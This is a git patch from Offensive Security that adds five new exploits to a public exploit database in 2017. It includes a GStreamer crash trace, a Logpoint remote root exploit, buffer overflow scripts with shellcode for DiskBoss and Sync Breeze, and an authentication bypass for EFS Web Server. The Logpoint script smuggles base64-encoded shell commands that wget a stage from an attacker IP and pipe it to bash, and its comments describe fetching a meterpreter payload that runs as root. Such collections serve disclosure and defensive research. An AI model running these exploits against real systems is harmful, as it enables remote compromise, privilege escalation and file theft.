From 117f75fdfcfe48faaebdcb252e0c5c113f96f387 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 13 Jun 2017 05:01:23 +0000
Subject: [PATCH] DB: 2017-06-13

5 new exploits

GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference
DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow
Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow
Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution
Easy File Sharing Web Server 7.2 - Authentication Bypass
---
 files.csv | 5 ++
 platforms/linux/dos/42162.txt | 37 ++++++++++++++
 platforms/linux/remote/42158.py | 62 +++++++++++++++++++++++
 platforms/windows/local/42160.py | 78 +++++++++++++++++++++++++++++
 platforms/windows/local/42161.py | 79 ++++++++++++++++++++++++++++++
 platforms/windows/remote/42159.txt | 68 +++++++++++++++++++++++++
 6 files changed, 329 insertions(+)
 create mode 100755 platforms/linux/dos/42162.txt
 create mode 100755 platforms/linux/remote/42158.py
 create mode 100755 platforms/windows/local/42160.py
 create mode 100755 platforms/windows/local/42161.py
 create mode 100755 platforms/windows/remote/42159.txt

diff --git a/files.csv b/files.csv
index 38f6cd37c..e652db820 100644
--- a/files.csv
+++ b/files.csv
@@ -5539,6 +5539,7 @@ id,file,description,date,author,platform,type,port
 42144,platforms/linux/dos/42144.py,"Mapscrn 2.03 - Local Buffer Overflow",2017-06-09,"Juan Sacco",linux,dos,0
 42147,platforms/linux/dos/42147.txt,"libcroco 0.6.12 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
 42148,platforms/linux/dos/42148.txt,"libquicktime 1.2.4 - Denial of Service",2017-06-09,qflb.wu,linux,dos,0
+42162,platforms/linux/dos/42162.txt,"GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference",2017-06-12,"Hanno Boeck",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9045,6 +9046,8 @@ id,file,description,date,author,platform,type,port
 42145,platforms/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local,0
 42146,platforms/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local,0
 42157,platforms/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,windows,local,0
+42160,platforms/windows/local/42160.py,"DiskBoss 8.0.16 - 'Input Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
+42161,platforms/windows/local/42161.py,"Sync Breeze 9.7.26 - 'Add Exclude Directory' Local Buffer Overflow",2017-06-11,abatchy17,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15586,6 +15589,8 @@ id,file,description,date,author,platform,type,port
 42134,platforms/python/remote/42134.rb,"DC/OS Marathon UI - Docker Exploit (Metasploit)",2017-06-07,Metasploit,python,remote,0
 42152,platforms/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",multiple,remote,0
 42155,platforms/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",windows,remote,0
+42158,platforms/linux/remote/42158.py,"Logpoint < 5.6.4 - Unauthenticated Root Remote Code Execution",2017-06-11,agix,linux,remote,0
+42159,platforms/windows/remote/42159.txt,"Easy File Sharing Web Server 7.2 - Authentication Bypass",2017-06-11,"Touhid M.Shaikh",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
diff --git a/platforms/linux/dos/42162.txt b/platforms/linux/dos/42162.txt
new file mode 100755
index 000000000..b9437a0ec
--- /dev/null
+++ b/platforms/linux/dos/42162.txt
@@ -0,0 +1,37 @@
+Source: https://bugzilla.gnome.org/show_bug.cgi?id=775120
+
+The attached file will cause a null pointer access and segfault in the mpegts parser. Current git code, found with afl.
+
+ASAN stack trace:
+=================================================================
+==32545==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe957185495 bp 0x60200002cf7a sp 0x7fe956e027a0 T2)
+==32545==The signal is caused by a WRITE memory access.
+==32545==Hint: address points to the zero page.
+ #0 0x7fe957185494 in _parse_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32
+ #1 0x7fe957184058 in __common_section_checks /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:166:9
+ #2 0x7fe95718522f in gst_mpegts_section_get_pat /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:480:9
+ #3 0x7fe957438b9a in mpegts_base_apply_pat /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:942:20
+ #4 0x7fe957438b9a in mpegts_base_handle_psi /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1155
+ #5 0x7fe957437cd1 in mpegts_base_chain /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1424:11
+ #6 0x7fe9574341e7 in mpegts_base_loop /f/gstreamer/gst-plugins-bad/gst/mpegtsdemux/mpegtsbase.c:1589:13
+ #7 0x7fe9644305c3 in gst_task_func /f/gstreamer/gstreamer/gst/gsttask.c:334:5
+ #8 0x7fe96362f867 (/usr/lib64/libglib-2.0.so.0+0x70867)
+ #9 0x7fe96362eed4 (/usr/lib64/libglib-2.0.so.0+0x6fed4)
+ #10 0x7fe9630ac443 in start_thread (/lib64/libpthread.so.0+0x7443)
+ #11 0x7fe962bdb92c in clone (/lib64/libc.so.6+0xe792c)
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV /f/gstreamer/gst-plugins-bad/gst-libs/gst/mpegts/gstmpegtssection.c:441:32 in _parse_pat
+Thread T2 (tsdemux0:sink) created by T1 (typefind:sink) here:
+ #0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
+ #1 0x7fe96364cadf (/usr/lib64/libglib-2.0.so.0+0x8dadf)
+
+Thread T1 (typefind:sink) created by T0 here:
+ #0 0x42e26d in __interceptor_pthread_create (/usr/bin/gst-discoverer-1.0+0x42e26d)
+ #1 0x7fe96364cadf (/usr/lib64/libglib-2.0.so.0+0x8dadf)
+
+==32545==ABORTING
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42162.zip
diff --git a/platforms/linux/remote/42158.py b/platforms/linux/remote/42158.py
new file mode 100755
index 000000000..7c7a0aa23
--- /dev/null
+++ b/platforms/linux/remote/42158.py
@@ -0,0 +1,62 @@
+# Exploit Title: Unauthenticated remote root code execution on logpoint < 5.6.4
+# Date: 11/06/17
+# Exploit Author: agix
+# Vendor Homepage: https://www.logpoint.com
+# Version: logpoint < 5.6.4
+# Tested on: 5.6.2
+
+# Vendor contact 19/04
+# Exploit details sent to the vendor 24/04
+# Patch in test mode 05/05
+# Patch release to public 08/05
+
+
+# run python -m SimpleHTTPServer to serve second stage of the exploit in a file named e
+# to get root code execution this is the second stage e
+# wget http://YOUR_WEB_SERVER:8000/meterpreter -O /tmp/met && chmod 755 /tmp/met && sudo /opt/immune/installed/system/root_actions/create_symlink.sh /tmp/met /opt/immune/installed/system/root_actions/met ; sudo /opt/immune/installed/system/root_actions/met
+# it downloads a third stage executed as root
+
+import time
+import zmq
+import sys
+import json
+import random
+import string
+import base64
+
+ATTACKER_IP = '172.16.171.1'
+LOGPOINT_IP = '172.16.171.204'
+
+def crash():
+ context = zmq.Context()
+ sock = context.socket(zmq.DEALER)
+ sock.connect("tcp://%s:5504"%LOGPOINT_IP)
+ sock.send('crash')
+
+crash()
+time.sleep(1)
+
+context = zmq.Context()
+
+sock2 = context.socket(zmq.DEALER)
+sock2.connect("tcp://%s:5504"%LOGPOINT_IP)
+
+name = ''.join(random.choice(string.ascii_uppercase) for _ in range(6))
+
+cmd1 = base64.b64encode('wget http://%s:8000/e -O /tmp/e'%ATTACKER_IP)
+cmd2 = base64.b64encode('cat /tmp/e')
+
+exploit = '%s"; $(echo -n %s | base64 -d) && $(echo -n %s | base64 -d) | bash ; echo "test'%(name, cmd1, cmd2)
+
+tosend = json.dumps({"request_id": name, "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "add", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
+print tosend
+sock2.send(tosend)
+print sock2.recv()
+
+time.sleep(30)
+
+# cleaning
+tosend = json.dumps({"request_id": name+"-1", "query": "high_availability", "query_info": {"store_front_port": 5500, "action": "delete", "ip": ATTACKER_IP, "days": 12, "repo_name": name, "identifier": exploit}})
+print tosend
+sock2.send(tosend)
+print sock2.recv()
\ No newline at end of file
diff --git a/platforms/windows/local/42160.py b/platforms/windows/local/42160.py
new file mode 100755
index 000000000..35d4f1f54
--- /dev/null
+++ b/platforms/windows/local/42160.py
@@ -0,0 +1,78 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title: DiskBoss v8.0.16 - Local Buffer Overflow
+# Date: 11-06-2017
+# Exploit Author: @abatchy17 -- www.abatchy.com
+# Vulnerable Software: DiskBoss v8.0.16 (Freeware, Pro and Ultimate)
+# Vendor Homepage: http://www.disksorter.com/
+# Version: 8.0.16
+# Software Link: http://www.diskboss.com/downloads.html (Freeware, Pro and Ultimate)
+# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
+#
+# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input Directory" and paste the content of exploit.txt
+#
+# Only difference between this one and 42157 is that EBX is used
+#
+# Note: No typos!!11!
+#
+##############################################################################
+
+a = open("exploit.txt", "w")
+
+# Message= 0x65182c15 : jmp ebx | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\DiskBoss\bin\QtGui4.dll)
+jmpebx = "\x15\x2c\x18\x65" # Why JMP EBX? Buffer at ESP is split, bad!
+
+badchars = "\x0a\x0d\x2f"
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
+buf = ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
+buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
+buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
+buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
+buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
+buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
+buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
+buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
+buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
+buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
+buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
+buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
+buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
+buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
+buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
+buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
+buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
+buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
+buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
+buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
+buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
+buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
+buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
+buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
+buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
+buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
+buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
+buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
+buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
+buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
+
+llamaleftovers = (
+ "\x53" # push EBX
+ "\x58" # pop EAX
+ "\x05\x55\x55\x55\x55" # add EAX, 0x55555555
+ "\x05\x55\x55\x55\x55" # add EAX, 0x55555555
+ "\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBX + 233, shellcode generated should start exactly at EAX as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
+ )
+
+junk = "\x53\x5b" * 119 + "\x53"
+
+data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4) + llamaleftovers + junk + buf
+
+a.write(data)
+a.close()
diff --git a/platforms/windows/local/42161.py b/platforms/windows/local/42161.py
new file mode 100755
index 000000000..2349ee00f
--- /dev/null
+++ b/platforms/windows/local/42161.py
@@ -0,0 +1,79 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title: Sync Breeze v9.7.26 - Local Buffer Overflow
+# Date: 11-06-2017
+# Exploit Author: @abatchy17 -- www.abatchy.com
+# Vulnerable Software: Sync Breeze v9.7.26 (Freeware, Pro and Ultimate)
+# Vendor Homepage: http://www.syncbreeze.com
+# Version: 9.7.26
+# Software Link: http://www.syncbreeze.com/downloads.html (Freeware, Pro and Ultimate)
+# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
+#
+# To trigger the exploit:
+# 1. click "Add"
+# 2. enter any command name
+# 3. On new window, scroll down to "Exclude"
+# 4. Click "Add Exclude Directory"
+# 4. Paste text in exploit.txt into "Directory" field
+#
+##############################################################################
+
+a = open("exploit.txt", "w")
+
+# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Sync Breeze\bin\QtGui4.dll)
+jmpesp = "\x4e\x21\x1f\x65"
+
+badchars = "\x0a\x0d" # And 0x80 to 0xff
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d"
+buf = ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
+buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
+buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
+buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
+buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
+buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
+buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
+buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
+buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
+buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
+buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
+buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
+buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
+buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
+buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
+buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
+buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
+buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
+buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
+buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
+buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
+buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
+buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
+buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
+buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
+buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
+buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
+buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
+buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
+buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
+
+junk = "C" * (239)
+
+llamaleftovers = (
+ "\x54" # push ESP
+ "\x58" # pop EAX
+ "\x05\x55\x55\x55\x55" # add EAX, 0x55555555
+ "\x05\x55\x55\x55\x55" # add EAX, 0x55555555
+ "\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = old ESP + 0x100, shellcode generated should start exactly here as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
+ )
+
+data = "A"*4108 + jmpesp + llamaleftovers + junk + buf
+
+a.write(data)
+a.close()
diff --git a/platforms/windows/remote/42159.txt b/platforms/windows/remote/42159.txt
new file mode 100755
index 000000000..c8f44e11f
--- /dev/null
+++ b/platforms/windows/remote/42159.txt
@@ -0,0 +1,68 @@
+# Exploit Title: EFS Web Server 7.2 Authentication Bypass
+# Date: 11-06-2017
+# Software Link: http://www.sharing-file.com/efssetup.exe
+# Software Version : 7.2
+# Exploit Author: Touhid M.Shaikh
+# Contact: http://twitter.com/touhidshaikh22
+# Website: http://touhidshaikh.com/
+
+
+######## Description ########
+
+
+######## Video PoC and Article ########
+
+https://www.youtube.com/watch?v=XlTH7Fm1m1w
+http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/
+
+
+
+######## Attact Description ########
+
+
+######## Proof of Concept ########
+
+When we visit the EFS web server its prompt for login, now attacker just
+change url to below.
+Exploit....
+
+http://192.168.1.14/disk_c/
+
+in this case change drvie by just change /disk_c to /disk_
+example. /disk_d , /disk_f etc
+
+=============================================
+NOTE :: ::
+Now We have Permission to View Drives and Folder and Download Files. in
+Diffrent Drives or folder.
+============================================
+
+ _____ ___ _ _ _ _ ___ ____
+|_ _/ _ \| | | | | | |_ _| _ \
+ | || | | | | | | |_| || || | | |
+ | || |_| | |_| | _ || || |_| |
+ |_| \___/ \___/|_| |_|___|____/
+
+Touhid Shaikh.......
+